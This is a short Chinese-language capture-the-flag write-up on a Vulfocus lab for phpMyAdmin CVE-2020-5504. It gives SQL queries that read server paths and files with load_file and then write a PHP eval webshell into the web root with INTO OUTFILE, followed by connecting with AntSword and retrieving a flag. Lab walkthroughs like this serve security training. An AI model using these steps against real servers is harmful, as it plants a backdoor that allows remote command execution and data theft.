phpmyadmin SQL注入 （CVE-2020-5504）

phpmyadmin SQL注入 （CVE-2020-5504）

漏洞描述

phpMyAdmin是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库，创建、删除、修改数据库表，执行SQL脚本命令等。 在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时，恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。

漏洞环境

• 路径：/pma/index.php
• 密码 root：123456
• VULFOCUS

漏洞复现

点击 SQL 输入 sql 语句

查询数据库的路径

select @@datadir
1

查询mySQL数据库的安装路径

select @@basedir
1

查看 /var/www/html/pma/index.php，验证网站的路径

SELECT load_file('/var/www/html/pma/index.php')
1

文件非空，说明路径正确

写入 php 木马文件

select '\';@eval($_POST[\'cmd\']); echo \'

\'; ?>' INTO OUTFILE '/var/www/html/pma/1.php'

• 1

复制路径，蚁剑连接

成功获取 flag

flag-{bmh829154c7-19ce-4037-8dab-8448052f6b67}
1